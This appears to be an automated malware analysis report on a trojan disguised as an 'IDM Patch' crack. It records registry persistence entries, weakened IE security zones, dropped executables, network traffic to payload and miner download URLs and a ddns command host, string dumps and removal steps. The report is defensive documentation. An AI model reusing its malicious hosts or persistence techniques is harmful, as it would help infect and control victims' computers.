The process FB_1.tmp.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 93 15 00 08 2E FE 56 C6 77 F6 2F 6F A1 AA BB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software]
"pth" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
"MTX" = "e45b0a7574b2e3981138c55b46daa7852d30cbd7"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:\375569]
"mswindows.exe" = "mswindows"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software]
"zlODO3lxlyCXvdyvSwi5GQ==" = "qgng2IcmSCALK9lEqW0hOA=="
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software]
"prc" = "1452"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"UserInit" = "userinit.exe,%System%\clientsvr.exe"
The process xvnsxkn9.exe:2036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE F1 16 B2 01 77 18 E9 F1 CF 01 C4 EC E3 EA 33"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 6g4zx02q.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 C4 43 43 13 60 C1 A1 10 87 22 4C 76 52 9B 60"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 2957b873533fc8571480069ab5b8746d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\6g4zx02q.exe |
| 7fb59dc082e50a3f3d725ef0c25f0bea | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\FB_1.tmp.exe |
| 1e68bbae05d390109bee5e5ac1605aff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\FB_2.tmp.exe |
| f0e3f455c3b2630badf1888b911d374c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\b09bbc0c.exe |
| 20b782ed1f7216ec8e1cc95583d013eb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\bch_h8mn.exe |
| 989028e4bb41cf1219bc6a0482a3b2cb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\honmznj1.exe |
| 3497875e4db4dd5424e846ff019ca054 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\xvnsxkn9.exe |
| 7fb59dc082e50a3f3d725ef0c25f0bea | c:\WINDOWS\system32\clientsvr.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in ntdll.dll:
RtlGetNativeSystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mswindows.exe:436
b09bbc0c.exe:212
csc.exe:2616
csc.exe:3560
csc.exe:4040
csc.exe:3144
csc.exe:2456
csc.exe:3324
csc.exe:1936
csc.exe:2696
bch_h8mn.exe:2760
honmznj1.exe:3400
%original file name%.exe:1780
%original file name%.exe:580
ping.exe:2120
ping.exe:268
ping.exe:3496
ping.exe:2840
ping.exe:2948
ping.exe:2792
ping.exe:2504
ping.exe:3720
ping.exe:500
cvtres.exe:4056
cvtres.exe:3204
cvtres.exe:2624
cvtres.exe:3340
cvtres.exe:3608
cvtres.exe:2468
cvtres.exe:244
cvtres.exe:2748
system.exe:3452
system.exe:2308
system.exe:4032
system.exe:2688
system.exe:3312
system.exe:2796
system.exe:376
qrv670kf.exe:3256
qkjdmucq.exe:2752
FB_1.tmp.exe:1452
xvnsxkn9.exe:2036
6g4zx02q.exe:3644 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\4.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe (17178 bytes)
%System%\clientsvr.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC16.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCE.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC19.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC14.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC8.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC4.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.exe (4408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FB_1.tmp.exe (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FB_2.tmp.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESF.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES1A.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES17.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES9.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES15.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES5.tmp (2912 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.0.cs (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.0.cs (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.0.cs (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.0.cs (229 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe" - Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"UserInit" = "userinit.exe,%System%\clientsvr.exe"
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_1.tmp.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: www.crackingpatching.com
Product Name: C:UsersBlueDesktop32bit Patch build 11.exe
Product Version: 1,0,0,1
Legal Copyright: www.crackingpatching.com
Legal Trademarks:
Original Filename: C:UsersBlueDesktop32bit Patch build 11.exe
Internal Name: C:UsersBlueDesktop32bit Patch build 11.exe
File Version: 1,0,0,1
File Description: IDM Patch 6.23.b.11 Installation
Comments:
Language: English (United States)
Company Name: www.crackingpatching.com Product Name: C:UsersBlueDesktop32bit Patch build 11.exeProduct Version: 1,0,0,1Legal Copyright: www.crackingpatching.com Legal Trademarks: Original Filename: C:UsersBlueDesktop32bit Patch build 11.exeInternal Name: C:UsersBlueDesktop32bit Patch build 11.exeFile Version: 1,0,0,1File Description: IDM Patch 6.23.b.11 Installation Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 8852 | 12288 | 3.09822 | dfc8b6fd701d313a254222442ae77cd1 |
| .rsrc | 24576 | 2558556 | 2560000 | 5.41965 | 9c49e9055795b5aca864963ce017489f |
| .reloc | 2588672 | 12 | 4096 | 0.009099 | c200c86001b306e4bb91ec5bf08a7051 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://ge.tt/api/1/files/9UqgwvG2/0/blob?download | 54.195.252.180 |
| hxxp://s3-3-w.amazonaws.com/gett/9UqgwvG2/highminer.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=F2D0ijJ7bxCc3qgWfHy0EFjdjcE=&Expires=1433366459 | |
| hxxp://directexe.com/5DV/Dunk.exe | 104.18.58.181 |
| hxxp://directexe.com/5DV/Dunk.exe?download_token=55b3fba8d3b39e262afce4b9db568b3fb6321d6bd27219929b7e0ab453c89d97 | 104.18.58.181 |
| hxxp://s3.kkloud.com.s3.amazonaws.com/gett/9UqgwvG2/highminer.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=F2D0ijJ7bxCc3qgWfHy0EFjdjcE=&Expires=1433366459 | 54.231.133.193 |
| smaxzax.ddns.net | 88.150.224.102 |
| open.ge.tt | 54.247.122.87 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /gett/9UqgwvG2/highminer.files?response-content-disposition=attachment;&AWSAccessKeyId=AKIAI7XHZJPL62V2UOVA&Signature=F2D0ijJ7bxCc3qgWfHy0EFjdjcE=&Expires=1433366459 HTTP/1.1
Host: s3.kkloud.com.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: 6mhZ IOeB525zSJeUdutddXByZVEBKzmsFabpyfuspmyS7lQdGrfsus5XJgzuZO9WopaRAkMZC8=
x-amz-request-id: CCACDA724432611F
Date: Wed, 03 Jun 2015 21:11:10 GMT
Content-Disposition: attachment;
Last-Modified: Sat, 23 May 2015 04:41:37 GMT
ETag: "33b9f4f5c11b116c154ab3d0b2553d00-1"
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 2329600
Server: AmazonS3
...q....9.p.N.!!,#......0.(.:....a..z.q...Ay..~..\.x.........I.l....Nx.D...1{$.!.mN..y..88...YE..P.P..HM.0.E..i.J<...6d....d...u.u<OzD...\lu^]..H.wH%X.'.....):.=.:B...-..c..4.G'.p.7.0m...;........P...0Q.M...&.6...L.|........gz......}.XD.....>....2O....d.4.....X....n..f....#.O.......$.hz.!...f..~F.$..9..q..w.............0....*.k...T;.^.{).....CQr.A..U.q..UG.....\.a.}.........6...E....w.r.T..5...H..25O..i.C(.k./.......4p...4.i.r...KQ.$qB..;..sS..zn-kU....%...."..#V....=.z......>^....1V...|.....9J....|..4K._.....Ax.#t...IL*. ..-......s.dW.%...C.\.Bz...A./...Q..v.."S.n..........1v<.k/..=._..8..^..r.YL..M[.......-,.,......;Hx..%..6.....=U.%...~.J.E\...=...D.B9...D.V.>......... ..t..5Q..Fr.YI.."TA.^.m^.....K.Xz?\0..i0i2..\f...F..`r\....?r..(.Y.>......JI........3.....Q=..A.?_.....J._....)..I.;hC...\....w..2>.f$.....>........s.g.w.}.X./_K.".&V...3C....]...%a.....tDP.,?.L.........X...;.b.[4....Ol.xgg..A%.`.T.....7..z.d..2\..JdD....JrG..Y..kv,D.(.#4..F..wA....11W;..{...s....*q.dZ....L....cY.Vy ...>H.r.]...1..5Y.&..&.<Q.w.KM......j.X..Yj....>.-g........4..0..aQ0v....(..........T....<.(..\....k...........R/...x.(...G.|.v_.%.jc0.....Y..b..M...Z.....u..... .....2..../......x....*......\ i.wOK. .....e.....fs..J 3..Q.7.p3!..O].r....{^.....u)...,.f..Z....<..b.<....).=....w.hQFK~T;....n-lD.H...1..,P...... .%..NQi..?...s.....m..;..N...F...V.(f......., .Y....u$.....t...h.....x.Gr.DM0...we...h.......y.R......r......:...Q.......T>>n1v).'T C..1...;l[.(..gT...u..x.m}*..._.......Qm....
<<< skipped >>>
GET /5DV/Dunk.exe HTTP/1.1
Host: directexe.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Wed, 03 Jun 2015 21:11:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1c3be5dd98c19292a1354396503f39ae1433365869; expires=Thu, 02-Jun-16 21:11:09 GMT; path=/; domain=.directexe.com; HttpOnly
X-Powered-By: PHP/5.4.40
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: filehosting=ef917cbe5ac747329b78c315718c3aa0; expires=Thu, 04-Jun-2015 21:11:09 GMT; path=/
location: hXXp://directexe.com/5DV/Dunk.exe?download_token=55b3fba8d3b39e262afce4b9db568b3fb6321d6bd27219929b7e0ab453c89d97
Vary: User-Agent
Server: cloudflare-nginx
CF-RAY: 1f0e638e5be00f69-FRA
0......
GET /5DV/Dunk.exe?download_token=55b3fba8d3b39e262afce4b9db568b3fb6321d6bd27219929b7e0ab453c89d97 HTTP/1.1
Host: directexe.com
HTTP/1.1 200 OK
Date: Wed, 03 Jun 2015 21:11:10 GMT
Content-Type: application/octet-stream
Content-Length: 279552
Connection: keep-alive
Set-Cookie: __cfduid=deed0d8ff4291397a3b46f4755a45cdb11433365870; expires=Thu, 02-Jun-16 21:11:10 GMT; path=/; domain=.directexe.com; HttpOnly
X-Powered-By: PHP/5.4.40
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Disposition: attachment; filename="Dunk.exe"
Content-Description: File Transfer
Accept-Ranges: bytes
Access-Control-Allow-Origin: hXXp://directexe.com
Access-Control-Allow-Headers: Content-Type, Content-Range, Content-Disposition, Content-Description
Access-Control-Allow-Credentials: true
Set-Cookie: filehosting=93a75c0f82746c9de7f6c3d9a9b2a00a; expires=Thu, 04-Jun-2015 21:11:10 GMT; path=/
Content-Range: bytes 0-279551/279552
Vary: User-Agent
Server: cloudflare-nginx
CF-RAY: 1f0e63913c740f69-FRA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y;oU.................:..........^Y... ........@.. ....................................@..................................Y..W....`..8............................................................................ ............... ..H............text...d9... ...:.................. ..`.rsrc...8....`.......<..............@..@.reloc...............B..............@..B................@Y......H.......X;...............1...............................................0..........**...0..E.......~......... ........&.E..............(....t............(... ...3.* ..*....0..u.......~....... ......&.E................(...* J....(....t....... ...... N... .FH.a.&.......(... .....3... ........3.& .&..*....0..}........(...... ........&.E................>...~....-... ......&.......s.........~....(.....(...... ........&........s....(....* ..*....0..O.......~......,... ..........& .&..E................* .~.....o...... ..........& .&..*..0..........s....z*..0...........{....-O.. ........0.& .&..E................A...^.........}...... ........3.& .&.s....z.r...ps....o...... ........1.& .&.r...p(....&.. ........1.& .&..{.....o......8q........ .>.; .P`eZ.&.o....o.............r5..p...r5..p..o....* ..*.0..0........{....o....(....&.. ........&.E............* ..*.0..p..........,... ...... 5_.o ogsLZ.&.E................&....{......,... ..........& .&...(....* ..{....o...... ........&.*.0..N........s....}....
<<< skipped >>>
GET /api/1/files/9UqgwvG2/0/blob?download HTTP/1.1
Host: ge.tt
Connection: Keep-Alive
HTTP/1.1 307 Temporary Redirect
location: hXXps://open.ge.tt/1/files/9UqgwvG2/0/blob?download
Connection: keep-alive
Transfer-Encoding: chunked
0..HTTP/1.1 307 Temporary Redirect..location: hXXps://open.ge.tt/1/files/9UqgwvG2/0/blob?download..Connection: keep-alive..Transfer-Encoding: chunked..0..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
FB_2.tmp.exe_612:
.idata
.idata
.rdata
.rdata
P.reloc
P.reloc
P.rsrc
P.rsrc
uxtheme.dll
uxtheme.dll
c:\delphi7\Lib\KOL\KOL.pas
c:\delphi7\Lib\KOL\KOL.pas
Unsupported bitmap format
Unsupported bitmap format
;CRt$
;CRt$
PSAPI.dll
PSAPI.dll
kernel32.dll
kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows\CurrentVersion\GrpConv\MapGroups
Software\Microsoft\Windows
Software\Microsoft\Windows
SOFTWARE\Microsoft\.NETFramework\policy
SOFTWARE\Microsoft\.NETFramework\policy
..\sim.exe
..\sim.exe
user32.dll
user32.dll
GetKeyboardType
GetKeyboardType
advapi32.dll
advapi32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
oleaut32.dll
oleaut32.dll
WinExec
WinExec
gdi32.dll
gdi32.dll
GetKeyState
GetKeyState
ExitWindowsEx
ExitWindowsEx
EnumWindows
EnumWindows
winmm.dll
winmm.dll
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
GetWindowsDirectoryA
GetWindowsDirectoryA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegEnumKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegCreateKeyExA
ShellExecuteExA
ShellExecuteExA
ShellExecuteA
ShellExecuteA
cabinet.dll
cabinet.dll
=!=$=)=-=1=5=9=
=!=$=)=-=1=5=9=
KWindows
KWindows
UrlMon
UrlMon
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.SIM"
name="Microsoft.Windows.SIM"
Sandyseedings @ VVV.crackingpatching.com...
Sandyseedings @ VVV.crackingpatching.com...
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
VVV.crackingpatching.com
VVV.crackingpatching.com
VVV.crackingpatching.com
VVV.crackingpatching.com
FB_2.tmp.exe_612_rwx_00C2D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_2.tmp.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_2.tmp.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
FB_2.tmp.exe_612_rwx_00C4D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_2.tmp.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\FB_2.tmp.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
system.exe_2448:
.text
.text
`.rsrc
`.rsrc
@.reloc
@.reloc
%fZ_.
%fZ_.
.Dr*1
.Dr*1
pEXE
pEXE
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
>z.Js
>z.Js
G^.ug
G^.ug
T0OR[.MP
T0OR[.MP
xD9_.CU
xD9_.CU
Gjf%d
Gjf%d
B.Zh#
B.Zh#
.wSL{c
.wSL{c
v2.0.50727
v2.0.50727
System.Threading
System.Threading
Microsoft.VisualBasic
Microsoft.VisualBasic
Operators
Operators
Microsoft.VisualBasic.CompilerServices
Microsoft.VisualBasic.CompilerServices
System.Net.Sockets
System.Net.Sockets
System.Diagnostics
System.Diagnostics
System.Text
System.Text
WebClient
WebClient
System.Net
System.Net
System.IO
System.IO
WebHeaderCollection
WebHeaderCollection
System.ComponentModel
System.ComponentModel
System.Collections.Generic
System.Collections.Generic
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
Microsoft.VisualBasic.MyServices
TcpClient
TcpClient
System.Drawing
System.Drawing
System.Windows.Forms
System.Windows.Forms
SendKeys
SendKeys
System.Drawing.Drawing2D
System.Drawing.Drawing2D
CopyPixelOperation
CopyPixelOperation
System.Security.Cryptography
System.Security.Cryptography
System.Drawing.Imaging
System.Drawing.Imaging
System.IO.Compression
System.IO.Compression
AForge.Video.DirectShow
AForge.Video.DirectShow
AForge.Video
AForge.Video
System.Collections
System.Collections
System.Runtime.CompilerServices
System.Runtime.CompilerServices
System.Reflection
System.Reflection
System.Runtime.InteropServices
System.Runtime.InteropServices
Keyboard
Keyboard
Keys
Keys
System.Security
System.Security
System.Security.AccessControl
System.Security.AccessControl
System.Security.Principal
System.Security.Principal
System.Resources
System.Resources
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic.ApplicationServices
InvalidOperationException
InvalidOperationException
System.Configuration
System.Configuration
System.Collections.ObjectModel
System.Collections.ObjectModel
Microsoft.VisualBasic.FileIO
Microsoft.VisualBasic.FileIO
System.Timers
System.Timers
Microsoft.Win32
Microsoft.Win32
System.Management
System.Management
RegistryKey
RegistryKey
WebBrowser
WebBrowser
System.Net.NetworkInformation
System.Net.NetworkInformation
WindowsIdentity
WindowsIdentity
WindowsPrincipal
WindowsPrincipal
